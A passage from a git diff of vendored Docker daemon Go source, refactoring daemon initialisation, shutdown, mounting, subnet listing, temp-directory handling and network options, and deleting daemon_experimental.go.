"/run/docker/plugins", // possibly needs fixing + ExecRoot: getPluginExecRoot(config.Root), Store: d.PluginStore, - Executor: containerdRemote, + CreateExecutor: createPluginExec, RegistryService: registryService, LiveRestoreEnabled: config.LiveRestoreEnabled, LogPluginEvent: d.LogPluginEvent, // todo: make private + AuthzMiddleware: config.AuthzMiddleware, }) if err != nil { return nil, errors.Wrap(err, "couldn't create plugin manager") } - d.layerStore, err = layer.NewStoreFromOptions(layer.StoreOptions{ - StorePath: config.Root, - MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"), - GraphDriver: driverName, - GraphDriverOptions: config.GraphOptions, - UIDMaps: uidMaps, - GIDMaps: gidMaps, - PluginGetter: d.PluginStore, - ExperimentalEnabled: config.Experimental, - }) - if err != nil { + if err := d.setupDefaultLogConfig(); err != nil { return nil, err } - graphDriver := d.layerStore.DriverName() - imageRoot := filepath.Join(config.Root, "image", graphDriver) + for operatingSystem, gd := range d.graphDrivers { + layerStores[operatingSystem], err = layer.NewStoreFromOptions(layer.StoreOptions{ + Root: config.Root, + MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"), + GraphDriver: gd, + GraphDriverOptions: config.GraphOptions, + IDMappings: idMappings, + PluginGetter: d.PluginStore, + ExperimentalEnabled: config.Experimental, + OS: operatingSystem, + }) + if err != nil { + return nil, err + } + } - // Configure and validate the kernels security support - if err := configureKernelSecuritySupport(config, graphDriver); err != nil { - return nil, err + // As layerstore initialization may set the driver + for os := range d.graphDrivers { + d.graphDrivers[os] = layerStores[os].DriverName() } - logrus.Debugf("Max Concurrent Downloads: %d", *config.MaxConcurrentDownloads) - d.downloadManager = xfer.NewLayerDownloadManager(d.layerStore, *config.MaxConcurrentDownloads) - logrus.Debugf("Max Concurrent Uploads: %d", *config.MaxConcurrentUploads) - d.uploadManager = xfer.NewLayerUploadManager(*config.MaxConcurrentUploads) + // Configure and validate the kernels security support. Note this is a Linux/FreeBSD + // operation only, so it is safe to pass *just* the runtime OS graphdriver. + if err := configureKernelSecuritySupport(config, d.graphDrivers[runtime.GOOS]); err != nil { + return nil, err + } + imageRoot := filepath.Join(config.Root, "image", d.graphDrivers[runtime.GOOS]) ifs, err := image.NewFSStoreBackend(filepath.Join(imageRoot, "imagedb")) if err != nil { return nil, err } - d.imageStore, err = image.NewImageStore(ifs, d.layerStore) + lgrMap := make(map[string]image.LayerGetReleaser) + for os, ls := range layerStores { + lgrMap[os] = ls + } + imageStore, err := image.NewImageStore(ifs, lgrMap) if err != nil { return nil, err } - // Configure the volumes driver - volStore, err := d.configureVolumes(rootUID, rootGID) + d.volumes, err = volumesservice.NewVolumeService(config.Root, d.PluginStore, rootIDs, d) if err != nil { return nil, err } - trustKey, err := api.LoadOrCreateTrustKey(config.TrustKeyPath) + trustKey, err := loadOrCreateTrustKey(config.TrustKeyPath) if err != nil { return nil, err } trustDir := filepath.Join(config.Root, "trust") - if err := system.MkdirAll(trustDir, 0700); err != nil { + if err := system.MkdirAll(trustDir, 0700, ""); err != nil { return nil, err } - distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution")) + // We have a single tag/reference store for the daemon globally. However, it's + // stored under the graphdriver. On host platforms which only support a single + // container OS, but multiple selectable graphdrivers, this means depending on which + // graphdriver is chosen, the global reference store is under there. For + // platforms which support multiple container operating systems, this is slightly + // more problematic as where does the global ref store get located? Fortunately, + // for Windows, which is currently the only daemon supporting multiple container + // operating systems, the list of graphdrivers available isn't user configurable. + // For backwards compatibility, we just put it under the windowsfilter + // directory regardless. + refStoreLocation := filepath.Join(imageRoot, `repositories.json`) + rs, err := refstore.NewReferenceStore(refStoreLocation) if err != nil { - return nil, err + return nil, fmt.Errorf("Couldn't create reference store repository: %s", err) } - eventsService := events.New() - - referenceStore, err := reference.NewReferenceStore(filepath.Join(imageRoot, "repositories.json")) + distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution")) if err != nil { - return nil, fmt.Errorf("Couldn't create Tag store repositories: %s", err) + return nil, err } - migrationStart := time.Now() - if err := v1.Migrate(config.Root, graphDriver, d.layerStore, d.imageStore, referenceStore, distributionMetadataStore); err != nil { - logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. We recommend starting over with a clean storage directory if possible.", err) + // No content-addressability migration on Windows as it never supported pre-CA + if runtime.GOOS != "windows" { + migrationStart := time.Now() + if err := v1.Migrate(config.Root, d.graphDrivers[runtime.GOOS], layerStores[runtime.GOOS], imageStore, rs, distributionMetadataStore); err != nil { + logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. We recommend starting over with a clean storage directory if possible.", err) + } + logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds()) } - logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds()) // Discovery is only enabled when the daemon is launched with an address to advertise. When - // initialized, the daemon is registered and we can store the discovery backend as its read-only + // initialized, the daemon is registered and we can store the discovery backend as it's read-only if err := d.initDiscovery(config); err != nil { return nil, err } @@ -673,36 +838,46 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot // Check if Devices cgroup is mounted, it is hard requirement for container security, // on Linux. if runtime.GOOS == "linux" && !sysInfo.CgroupDevicesEnabled { - return nil, fmt.Errorf("Devices cgroup isn't mounted") + return nil, errors.New("Devices cgroup isn't mounted") } d.ID = trustKey.PublicKey().KeyID() d.repository = daemonRepo d.containers = container.NewMemoryStore() + if d.containersReplica, err = container.NewViewDB(); err != nil { + return nil, err + } d.execCommands = exec.NewStore() - d.referenceStore = referenceStore - d.distributionMetadataStore = distributionMetadataStore - d.trustKey = trustKey d.idIndex = truncindex.NewTruncIndex([]string{}) d.statsCollector = d.newStatsCollector(1 * time.Second) - d.defaultLogConfig = containertypes.LogConfig{ - Type: config.LogConfig.Type, - Config: config.LogConfig.Config, - } - d.EventsService = eventsService - d.volumes = volStore + + d.EventsService = events.New() d.root = config.Root - d.uidMaps = uidMaps - d.gidMaps = gidMaps + d.idMappings = idMappings d.seccompEnabled = sysInfo.Seccomp + d.apparmorEnabled = sysInfo.AppArmor - d.nameIndex = registrar.NewRegistrar() d.linkIndex = newLinkIndex() - d.containerdRemote = containerdRemote + + // TODO: imageStore, distributionMetadataStore, and ReferenceStore are only + // used above to run migration. They could be initialized in ImageService + // if migration is called from daemon/images. layerStore might move as well. + d.imageService = images.NewImageService(images.ImageServiceConfig{ + ContainerStore: d.containers, + DistributionMetadataStore: distributionMetadataStore, + EventsService: d.EventsService, + ImageStore: imageStore, + LayerStores: layerStores, + MaxConcurrentDownloads: *config.MaxConcurrentDownloads, + MaxConcurrentUploads: *config.MaxConcurrentUploads, + ReferenceStore: rs, + RegistryService: registryService, + TrustKey: trustKey, + }) go d.execCommandGC() - d.containerd, err = containerdRemote.Client(d) + d.containerd, err = containerdRemote.NewClient(ContainersNamespace, d) if err != nil { return nil, err } @@ -710,91 +885,90 @@ func NewDaemon(config *Config, registryService registry.Service, containerdRemot if err := d.restore(); err != nil { return nil, err } + close(d.startupDone) // FIXME: this method never returns an error info, _ := d.SystemInfo() - engineVersion.WithValues( + engineInfo.WithValues( dockerversion.Version, dockerversion.GitCommit, info.Architecture, info.Driver, info.KernelVersion, info.OperatingSystem, + info.OSType, + info.ID, ).Set(1) engineCpus.Set(float64(info.NCPU)) engineMemory.Set(float64(info.MemTotal)) - // set up SIGUSR1 handler on Unix-like systems, or a Win32 global event - // on Windows to dump Go routine stacks - stackDumpDir := config.Root - if execRoot := config.GetExecRoot(); execRoot != "" { - stackDumpDir = execRoot + gd := "" + for os, driver := range d.graphDrivers { + if len(gd) > 0 { + gd += ", " + } + gd += driver + if len(d.graphDrivers) > 1 { + gd = fmt.Sprintf("%s (%s)", gd, os) + } } - d.setupDumpStackTrap(stackDumpDir) + logrus.WithFields(logrus.Fields{ + "version": dockerversion.Version, + "commit": dockerversion.GitCommit, + "graphdriver(s)": gd, + }).Info("Docker daemon") return d, nil } +// DistributionServices returns services controlling daemon storage +func (daemon *Daemon) DistributionServices() images.DistributionServices { + return daemon.imageService.DistributionServices() +} + +func (daemon *Daemon) waitForStartupDone() { + <-daemon.startupDone +} + func (daemon *Daemon) shutdownContainer(c *container.Container) error { stopTimeout := c.StopTimeout() - // TODO(windows): Handle docker restart with paused containers - if c.IsPaused() { - // To terminate a process in freezer cgroup, we should send - // SIGTERM to this process then unfreeze it, and the process will - // force to terminate immediately. - logrus.Debugf("Found container %s is paused, sending SIGTERM before unpausing it", c.ID) - sig, ok := signal.SignalMap["TERM"] - if !ok { - return fmt.Errorf("System does not support SIGTERM") - } - if err := daemon.kill(c, int(sig)); err != nil { - return fmt.Errorf("sending SIGTERM to container %s with error: %v", c.ID, err) - } - if err := daemon.containerUnpause(c); err != nil { - return fmt.Errorf("Failed to unpause container %s with error: %v", c.ID, err) - } - if _, err := c.WaitStop(time.Duration(stopTimeout) * time.Second); err != nil { - logrus.Debugf("container %s failed to exit in %d second of SIGTERM, sending SIGKILL to force", c.ID, stopTimeout) - sig, ok := signal.SignalMap["KILL"] - if !ok { - return fmt.Errorf("System does not support SIGKILL") - } - if err := daemon.kill(c, int(sig)); err != nil { - logrus.Errorf("Failed to SIGKILL container %s", c.ID) - } - c.WaitStop(-1 * time.Second) - return err - } - } + // If container failed to exit in stopTimeout seconds of SIGTERM, then using the force if err := daemon.containerStop(c, stopTimeout); err != nil { return fmt.Errorf("Failed to stop container %s with error: %v", c.ID, err) } - c.WaitStop(-1 * time.Second) + // Wait without timeout for the container to exit. + // Ignore the result. + <-c.Wait(context.Background(), container.WaitConditionNotRunning) return nil } -// ShutdownTimeout returns the shutdown timeout based on the max stopTimeout of the containers, -// and is limited by daemon's ShutdownTimeout. +// ShutdownTimeout returns the timeout (in seconds) before containers are forcibly +// killed during shutdown. The default timeout can be configured both on the daemon +// and per container, and the longest timeout will be used. A grace-period of +// 5 seconds is added to the configured timeout. +// +// A negative (-1) timeout means "indefinitely", which means that containers +// are not forcibly killed, and the daemon shuts down after all containers exit. func (daemon *Daemon) ShutdownTimeout() int { - // By default we use daemon's ShutdownTimeout. shutdownTimeout := daemon.configStore.ShutdownTimeout + if shutdownTimeout < 0 { + return -1 + } + if daemon.containers == nil { + return shutdownTimeout + } graceTimeout := 5 - if daemon.containers != nil { - for _, c := range daemon.containers.List() { - if shutdownTimeout >= 0 { - stopTimeout := c.StopTimeout() - if stopTimeout < 0 { - shutdownTimeout = -1 - } else { - if stopTimeout+graceTimeout > shutdownTimeout { - shutdownTimeout = stopTimeout + graceTimeout - } - } - } + for _, c := range daemon.containers.List() { + stopTimeout := c.StopTimeout() + if stopTimeout < 0 { + return -1 + } + if stopTimeout+graceTimeout > shutdownTimeout { + shutdownTimeout = stopTimeout + graceTimeout } } return shutdownTimeout @@ -809,12 +983,15 @@ func (daemon *Daemon) Shutdown() error { if daemon.configStore.LiveRestoreEnabled && daemon.containers != nil { // check if there are any running containers, if none we should do some cleanup if ls, err := daemon.Containers(&types.ContainerListOptions{}); len(ls) != 0 || err != nil { + // metrics plugins still need some cleanup + daemon.cleanupMetricsPlugins() return nil } } if daemon.containers != nil { - logrus.Debugf("start clean shutdown of all containers with a %d seconds timeout...", daemon.configStore.ShutdownTimeout) + logrus.Debugf("daemon configured with a %d seconds minimum shutdown timeout", daemon.configStore.ShutdownTimeout) + logrus.Debugf("start clean shutdown of all containers with a %d seconds timeout...", daemon.ShutdownTimeout()) daemon.containers.ApplyAll(func(c *container.Container) { if !c.IsRunning() { return @@ -824,7 +1001,7 @@ func (daemon *Daemon) Shutdown() error { logrus.Errorf("Stop container error: %v", err) return } - if mountid, err := daemon.layerStore.GetMountID(c.ID); err == nil { + if mountid, err := daemon.imageService.GetLayerMountID(c.ID, c.OS); err == nil { daemon.cleanupMountsByID(mountid) } logrus.Debugf("container stopped %s", c.ID) @@ -837,12 +1014,18 @@ func (daemon *Daemon) Shutdown() error { } } - if daemon.layerStore != nil { - if err := daemon.layerStore.Cleanup(); err != nil { - logrus.Errorf("Error during layer Store.Cleanup(): %v", err) - } + if daemon.imageService != nil { + daemon.imageService.Cleanup() } + // If we are part of a cluster, clean up cluster's stuff + if daemon.clusterProvider != nil { + logrus.Debugf("start clean shutdown of cluster resources...") + daemon.DaemonLeavesCluster() + } + + daemon.cleanupMetricsPlugins() + // Shutdown plugins after containers and layerstore. Don't change the order. daemon.pluginShutdown() @@ -851,30 +1034,29 @@ func (daemon *Daemon) Shutdown() error { daemon.netController.Stop() } - if err := daemon.cleanupMounts(); err != nil { - return err - } - - return nil + return daemon.cleanupMounts() } // Mount sets container.BaseFS // (is it not set coming in? why is it unset?) func (daemon *Daemon) Mount(container *container.Container) error { + if container.RWLayer == nil { + return errors.New("RWLayer of container " + container.ID + " is unexpectedly nil") + } dir, err := container.RWLayer.Mount(container.GetMountLabel()) if err != nil { return err } logrus.Debugf("container mounted via layerStore: %v", dir) - if container.BaseFS != dir { + if container.BaseFS != nil && container.BaseFS.Path() != dir.Path() { // The mount path reported by the graph driver should always be trusted on Windows, since the // volume path for a given mounted layer may change over time. This should only be an error // on non-Windows operating systems. - if container.BaseFS != "" && runtime.GOOS != "windows" { + if runtime.GOOS != "windows" { daemon.Unmount(container) return fmt.Errorf("Error: driver %s is returning inconsistent paths for container %s ('%s' then '%s')", - daemon.GraphDriverName(), container.ID, container.BaseFS, dir) + daemon.imageService.GraphDriverForOS(container.OS), container.ID, container.BaseFS, dir) } } container.BaseFS = dir // TODO: combine these fields @@ -883,6 +1065,9 @@ func (daemon *Daemon) Mount(container *container.Container) error { // Unmount unsets the container base filesystem func (daemon *Daemon) Unmount(container *container.Container) error { + if container.RWLayer == nil { + return errors.New("RWLayer of container " + container.ID + " is unexpectedly nil") + } if err := container.RWLayer.Unmount(); err != nil { logrus.Errorf("Error unmounting container %s: %s", container.ID, err) return err @@ -891,96 +1076,73 @@ func (daemon *Daemon) Unmount(container *container.Container) error { return nil } -// V4Subnets returns the IPv4 subnets of networks that are managed by Docker. -func (daemon *Daemon) V4Subnets() []net.IPNet { - var subnets []net.IPNet +// Subnets return the IPv4 and IPv6 subnets of networks that are manager by Docker. +func (daemon *Daemon) Subnets() ([]net.IPNet, []net.IPNet) { + var v4Subnets []net.IPNet + var v6Subnets []net.IPNet managedNetworks := daemon.netController.Networks() for _, managedNetwork := range managedNetworks { - v4Infos, _ := managedNetwork.Info().IpamInfo() - for _, v4Info := range v4Infos { - if v4Info.IPAMData.Pool != nil { - subnets = append(subnets, *v4Info.IPAMData.Pool) + v4infos, v6infos := managedNetwork.Info().IpamInfo() + for _, info := range v4infos { + if info.IPAMData.Pool != nil { + v4Subnets = append(v4Subnets, *info.IPAMData.Pool) } } - } - - return subnets -} - -// V6Subnets returns the IPv6 subnets of networks that are managed by Docker. -func (daemon *Daemon) V6Subnets() []net.IPNet { - var subnets []net.IPNet - - managedNetworks := daemon.netController.Networks() - - for _, managedNetwork := range managedNetworks { - _, v6Infos := managedNetwork.Info().IpamInfo() - for _, v6Info := range v6Infos { - if v6Info.IPAMData.Pool != nil { - subnets = append(subnets, *v6Info.IPAMData.Pool) + for _, info := range v6infos { + if info.IPAMData.Pool != nil { + v6Subnets = append(v6Subnets, *info.IPAMData.Pool) } } } - return subnets -} - -// GraphDriverName returns the name of the graph driver used by the layer.Store -func (daemon *Daemon) GraphDriverName() string { - return daemon.layerStore.DriverName() -} - -// GetUIDGIDMaps returns the current daemon's user namespace settings -// for the full uid and gid maps which will be applied to containers -// started in this instance. -func (daemon *Daemon) GetUIDGIDMaps() ([]idtools.IDMap, []idtools.IDMap) { - return daemon.uidMaps, daemon.gidMaps + return v4Subnets, v6Subnets } -// GetRemappedUIDGID returns the current daemon's uid and gid values -// if user namespaces are in use for this daemon instance. If not -// this function will return "real" root values of 0, 0. -func (daemon *Daemon) GetRemappedUIDGID() (int, int) { - uid, gid, _ := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps) - return uid, gid -} - -// tempDir returns the default directory to use for temporary files. -func tempDir(rootDir string, rootUID, rootGID int) (string, error) { +// prepareTempDir prepares and returns the default directory to use +// for temporary files. +// If it doesn't exist, it is created. If it exists, its content is removed. +func prepareTempDir(rootDir string, rootIDs idtools.IDPair) (string, error) { var tmpDir string if tmpDir = os.Getenv("DOCKER_TMPDIR"); tmpDir == "" { tmpDir = filepath.Join(rootDir, "tmp") + newName := tmpDir + "-old" + if err := os.Rename(tmpDir, newName); err == nil { + go func() { + if err := os.RemoveAll(newName); err != nil { + logrus.Warnf("failed to delete old tmp directory: %s", newName) + } + }() + } else if !os.IsNotExist(err) { + logrus.Warnf("failed to rename %s for background deletion: %s. Deleting synchronously", tmpDir, err) + if err := os.RemoveAll(tmpDir); err != nil { + logrus.Warnf("failed to delete old tmp directory: %s", tmpDir) + } + } } - return tmpDir, idtools.MkdirAllAs(tmpDir, 0700, rootUID, rootGID) -} - -func (daemon *Daemon) setupInitLayer(initPath string) error { - rootUID, rootGID := daemon.GetRemappedUIDGID() - return initlayer.Setup(initPath, rootUID, rootGID) -} - -func setDefaultMtu(config *Config) { - // do nothing if the config does not have the default 0 value. - if config.Mtu != 0 { - return - } - config.Mtu = defaultNetworkMtu + // We don't remove the content of tmpdir if it's not the default, + // it may hold things that do not belong to us. + return tmpDir, idtools.MkdirAllAndChown(tmpDir, 0700, rootIDs) } -func (daemon *Daemon) configureVolumes(rootUID, rootGID int) (*store.VolumeStore, error) { - volumesDriver, err := local.New(daemon.configStore.Root, rootUID, rootGID) +func (daemon *Daemon) setGenericResources(conf *config.Config) error { + genericResources, err := config.ParseGenericResources(conf.NodeGenericResources) if err != nil { - return nil, err + return err } - volumedrivers.RegisterPluginGetter(daemon.PluginStore) + daemon.genericResources = genericResources - if !volumedrivers.Register(volumesDriver, volumesDriver.Name()) { - return nil, fmt.Errorf("local volume driver could not be registered") + return nil +} + +func setDefaultMtu(conf *config.Config) { + // do nothing if the config does not have the default 0 value. + if conf.Mtu != 0 { + return } - return store.New(daemon.configStore.Root) + conf.Mtu = config.DefaultNetworkMtu } // IsShuttingDown tells whether the daemon is shutting down or not @@ -989,17 +1151,17 @@ func (daemon *Daemon) IsShuttingDown() bool { } // initDiscovery initializes the discovery watcher for this daemon. -func (daemon *Daemon) initDiscovery(config *Config) error { - advertise, err := parseClusterAdvertiseSettings(config.ClusterStore, config.ClusterAdvertise) +func (daemon *Daemon) initDiscovery(conf *config.Config) error { + advertise, err := config.ParseClusterAdvertiseSettings(conf.ClusterStore, conf.ClusterAdvertise) if err != nil { - if err == errDiscoveryDisabled { + if err == discovery.ErrDiscoveryDisabled { return nil } return err } - config.ClusterAdvertise = advertise - discoveryWatcher, err := initDiscovery(config.ClusterStore, config.ClusterAdvertise, config.ClusterOpts) + conf.ClusterAdvertise = advertise + discoveryWatcher, err := discovery.Init(conf.ClusterStore, conf.ClusterAdvertise, conf.ClusterOpts) if err != nil { return fmt.Errorf("discovery initialization failed (%v)", err) } @@ -1008,199 +1170,11 @@ func (daemon *Daemon) initDiscovery(config *Config) error { return nil } -// Reload reads configuration changes and modifies the -// daemon according to those changes. -// These are the settings that Reload changes: -// - Daemon labels. -// - Daemon debug log level. -// - Daemon insecure registries. -// - Daemon max concurrent downloads -// - Daemon max concurrent uploads -// - Cluster discovery (reconfigure and restart). -// - Daemon live restore -// - Daemon shutdown timeout (in seconds). -func (daemon *Daemon) Reload(config *Config) (err error) { - - daemon.configStore.reloadLock.Lock() - - attributes := daemon.platformReload(config) - - defer func() { - // we're unlocking here, because - // LogDaemonEventWithAttributes() -> SystemInfo() -> GetAllRuntimes() - // holds that lock too. - daemon.configStore.reloadLock.Unlock() - if err == nil { - daemon.LogDaemonEventWithAttributes("reload", attributes) - } - }() - - if err := daemon.reloadClusterDiscovery(config); err != nil { - return err - } - - if config.IsValueSet("labels") { - daemon.configStore.Labels = config.Labels - } - if config.IsValueSet("debug") { - daemon.configStore.Debug = config.Debug - } - if config.IsValueSet("insecure-registries") { - daemon.configStore.InsecureRegistries = config.InsecureRegistries - if err := daemon.RegistryService.LoadInsecureRegistries(config.InsecureRegistries); err != nil { - return err - } - } - if config.IsValueSet("live-restore") { - daemon.configStore.LiveRestoreEnabled = config.LiveRestoreEnabled - if err := daemon.containerdRemote.UpdateOptions(libcontainerd.WithLiveRestore(config.LiveRestoreEnabled)); err != nil { - return err - } - } - - // If no value is set for max-concurrent-downloads we assume it is the default value - // We always "reset" as the cost is lightweight and easy to maintain. - if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil { - *daemon.configStore.MaxConcurrentDownloads = *config.MaxConcurrentDownloads - } else { - maxConcurrentDownloads := defaultMaxConcurrentDownloads - daemon.configStore.MaxConcurrentDownloads = &maxConcurrentDownloads - } - logrus.Debugf("Reset Max Concurrent Downloads: %d", *daemon.configStore.MaxConcurrentDownloads) - if daemon.downloadManager != nil { - daemon.downloadManager.SetConcurrency(*daemon.configStore.MaxConcurrentDownloads) - } - - // If no value is set for max-concurrent-upload we assume it is the default value - // We always "reset" as the cost is lightweight and easy to maintain. - if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil { - *daemon.configStore.MaxConcurrentUploads = *config.MaxConcurrentUploads - } else { - maxConcurrentUploads := defaultMaxConcurrentUploads - daemon.configStore.MaxConcurrentUploads = &maxConcurrentUploads - } - logrus.Debugf("Reset Max Concurrent Uploads: %d", *daemon.configStore.MaxConcurrentUploads) - if daemon.uploadManager != nil { - daemon.uploadManager.SetConcurrency(*daemon.configStore.MaxConcurrentUploads) - } - - if config.IsValueSet("shutdown-timeout") { - daemon.configStore.ShutdownTimeout = config.ShutdownTimeout - logrus.Debugf("Reset Shutdown Timeout: %d", daemon.configStore.ShutdownTimeout) - } - - // We emit daemon reload event here with updatable configurations - attributes["debug"] = fmt.Sprintf("%t", daemon.configStore.Debug) - attributes["live-restore"] = fmt.Sprintf("%t", daemon.configStore.LiveRestoreEnabled) - - if daemon.configStore.InsecureRegistries != nil { - insecureRegistries, err := json.Marshal(daemon.configStore.InsecureRegistries) - if err != nil { - return err - } - attributes["insecure-registries"] = string(insecureRegistries) - } else { - attributes["insecure-registries"] = "[]" - } - - attributes["cluster-store"] = daemon.configStore.ClusterStore - if daemon.configStore.ClusterOpts != nil { - opts, err := json.Marshal(daemon.configStore.ClusterOpts) - if err != nil { - return err - } - attributes["cluster-store-opts"] = string(opts) - } else { - attributes["cluster-store-opts"] = "{}" - } - attributes["cluster-advertise"] = daemon.configStore.ClusterAdvertise - - if daemon.configStore.Labels != nil { - labels, err := json.Marshal(daemon.configStore.Labels) - if err != nil { - return err - } - attributes["labels"] = string(labels) - } else { - attributes["labels"] = "[]" - } - - attributes["max-concurrent-downloads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentDownloads) - attributes["max-concurrent-uploads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentUploads) - attributes["shutdown-timeout"] = fmt.Sprintf("%d", daemon.configStore.ShutdownTimeout) - - return nil -} - -func (daemon *Daemon) reloadClusterDiscovery(config *Config) error { - var err error - newAdvertise := daemon.configStore.ClusterAdvertise - newClusterStore := daemon.configStore.ClusterStore - if config.IsValueSet("cluster-advertise") { - if config.IsValueSet("cluster-store") { - newClusterStore = config.ClusterStore - } - newAdvertise, err = parseClusterAdvertiseSettings(newClusterStore, config.ClusterAdvertise) - if err != nil && err != errDiscoveryDisabled { - return err - } - } - - if daemon.clusterProvider != nil { - if err := config.isSwarmCompatible(); err != nil { - return err - } - } - - // check discovery modifications - if !modifiedDiscoverySettings(daemon.configStore, newAdvertise, newClusterStore, config.ClusterOpts) { - return nil - } - - // enable discovery for the first time if it was not previously enabled - if daemon.discoveryWatcher == nil { - discoveryWatcher, err := initDiscovery(newClusterStore, newAdvertise, config.ClusterOpts) - if err != nil { - return fmt.Errorf("discovery initialization failed (%v)", err) - } - daemon.discoveryWatcher = discoveryWatcher - } else { - if err == errDiscoveryDisabled { - // disable discovery if it was previously enabled and it's disabled now - daemon.discoveryWatcher.Stop() - } else { - // reload discovery - if err = daemon.discoveryWatcher.Reload(config.ClusterStore, newAdvertise, config.ClusterOpts); err != nil { - return err - } - } - } - - daemon.configStore.ClusterStore = newClusterStore - daemon.configStore.ClusterOpts = config.ClusterOpts - daemon.configStore.ClusterAdvertise = newAdvertise - - if daemon.netController == nil { - return nil - } - netOptions, err := daemon.networkOptions(daemon.configStore, daemon.PluginStore, nil) - if err != nil { - logrus.WithError(err).Warnf("failed to get options with network controller") - return nil - } - err = daemon.netController.ReloadConfiguration(netOptions...) - if err != nil { - logrus.Warnf("Failed to reload configuration with network controller: %v", err) - } - - return nil -} - -func isBridgeNetworkDisabled(config *Config) bool { - return config.bridgeConfig.Iface == disableNetworkBridge +func isBridgeNetworkDisabled(conf *config.Config) bool { + return conf.BridgeConfig.Iface == config.DisableNetworkBridge } -func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) { +func (daemon *Daemon) networkOptions(dconfig *config.Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) { options := []nwconfig.Option{} if dconfig == nil { return options, nil @@ -1218,7 +1192,7 @@ func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGett if strings.TrimSpace(dconfig.ClusterStore) != "" { kv := strings.Split(dconfig.ClusterStore, "://") if len(kv) != 2 { - return nil, fmt.Errorf("kv store daemon config must be of the form KV-PROVIDER://KV-URL") + return nil, errors.New("kv store daemon config must be of the form KV-PROVIDER://KV-URL") } options = append(options, nwconfig.OptionKVProvider(kv[0])) options = append(options, nwconfig.OptionKVProviderURL(kv[1])) @@ -1238,6 +1212,10 @@ func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGett options = append(options, nwconfig.OptionLabels(dconfig.Labels)) options = append(options, driverOptions(dconfig)...) + if len(dconfig.NetworkConfig.DefaultAddressPools.Value()) > 0 { + options = append(options, nwconfig.OptionDefaultAddressPoolConfig(dconfig.NetworkConfig.DefaultAddressPools.Value())) + } + if daemon.configStore != nil && daemon.configStore.LiveRestoreEnabled && len(activeSandboxes) != 0 { options = append(options, nwconfig.OptionActiveSandboxes(activeSandboxes)) } @@ -1246,20 +1224,9 @@ func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGett options = append(options, nwconfig.OptionPluginGetter(pg)) } - return options, nil -} + options = append(options, nwconfig.OptionNetworkControlPlaneMTU(dconfig.NetworkControlPlaneMTU)) -func copyBlkioEntry(entries []*containerd.BlkioStatsEntry) []types.BlkioStatEntry { - out := make([]types.BlkioStatEntry, len(entries)) - for i, re := range entries { - out[i] = types.BlkioStatEntry{ - Major: re.Major, - Minor: re.Minor, - Op: re.Op, - Value: re.Value, - } - } - return out + return options, nil } // GetCluster returns the cluster @@ -1292,30 +1259,62 @@ func (daemon *Daemon) PluginGetter() *plugin.Store { } // CreateDaemonRoot creates the root for the daemon -func CreateDaemonRoot(config *Config) error { +func CreateDaemonRoot(config *config.Config) error { // get the canonical path to the Docker root directory var realRoot string if _, err := os.Stat(config.Root); err != nil && os.IsNotExist(err) { realRoot = config.Root } else { - realRoot, err = fileutils.ReadSymlinkedDirectory(config.Root) + realRoot, err = getRealPath(config.Root) if err != nil { return fmt.Errorf("Unable to get the full path to root (%s): %s", config.Root, err) } } - uidMaps, gidMaps, err := setupRemappedRoot(config) + idMappings, err := setupRemappedRoot(config) if err != nil { return err } - rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) - if err != nil { - return err + return setupDaemonRoot(config, realRoot, idMappings.RootPair()) +} + +// checkpointAndSave grabs a container lock to safely call container.CheckpointTo +func (daemon *Daemon) checkpointAndSave(container *container.Container) error { + container.Lock() + defer container.Unlock() + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + return fmt.Errorf("Error saving container state: %v", err) } + return nil +} - if err := setupDaemonRoot(config, realRoot, rootUID, rootGID); err != nil { - return err +// because the CLI sends a -1 when it wants to unset the swappiness value +// we need to clear it on the server side +func fixMemorySwappiness(resources *containertypes.Resources) { + if resources.MemorySwappiness != nil && *resources.MemorySwappiness == -1 { + resources.MemorySwappiness = nil } +} - return nil +// GetAttachmentStore returns current attachment store associated with the daemon +func (daemon *Daemon) GetAttachmentStore() *network.AttachmentStore { + return &daemon.attachmentStore +} + +// IDMappings returns uid/gid mappings for the builder +func (daemon *Daemon) IDMappings() *idtools.IDMappings { + return daemon.idMappings +} + +// ImageService returns the Daemon's ImageService +func (daemon *Daemon) ImageService() *images.ImageService { + return daemon.imageService +} + +// BuilderBackend returns the backend used by builder +func (daemon *Daemon) BuilderBackend() builder.Backend { + return struct { + *Daemon + *images.ImageService + }{daemon, daemon.imageService} } diff --git a/vendor/github.com/docker/docker/daemon/daemon_experimental.go b/vendor/github.com/docker/docker/daemon/daemon_experimental.go deleted file mode 100644 index fb0251d4af..0000000000 --- a/vendor/github.com/docker/docker/daemon/daemon_experimental.go +++ /dev/null @@ -1,7 +0,0 @@ -package daemon - -import "github.com/docker/docker/api/types/container" - -func (daemon *Daemon) verifyExperimentalContainerSettings(hostConfig *container.HostConfig, config *container.Config) ([]string, error) { - return nil, nil -} diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux.go b/vendor/github.com/docker/docker/daemon/daemon_linux.go index 9bdf6e2b79..7cb6727534 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_linux.go +++ 